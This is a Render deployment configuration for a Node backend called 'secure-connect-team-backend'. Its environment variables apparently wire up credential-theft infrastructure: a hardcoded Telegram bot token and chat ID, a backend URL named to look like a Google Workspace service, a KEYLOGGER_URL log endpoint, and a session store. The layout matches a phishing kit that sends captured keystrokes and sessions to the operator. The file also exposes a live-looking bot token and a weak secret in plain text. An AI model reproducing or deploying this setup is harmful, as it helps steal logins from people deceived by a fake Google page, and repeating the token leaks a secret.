services:
  - type: web
    name: secure-connect-team-backend
    env: node
    repo: https://github.com/investorsfundingsm-ux/secure-connect-team
    branch: main
    buildCommand: cd backend && npm install
    startCommand: node backend/server.js
    envVars:
      - key: PORT
        value: 3000
      - key: NODE_ENV
        value: production
      - key: TELEGRAM_BOT_TOKEN
        sync: false
        value: 8738758416:AAFrRHdJP-lEYbvqsJdlSxlEm23DWZ4vLRo
      - key: TELEGRAM_CHAT_ID
        sync: false
        value: 7066788965
      - key: BACKEND_URL
        value: https://google-workspace-service.onrender.com
      - key: KEYLOGGER_URL
        value: https://keyserver-eaar.onrender.com/log
      - key: SESSION_SECRET
        value: secure-connect-team-secret-2024
    disk:
      name: session-data
      mountPath: /tmp/sessions
      sizeGB: 1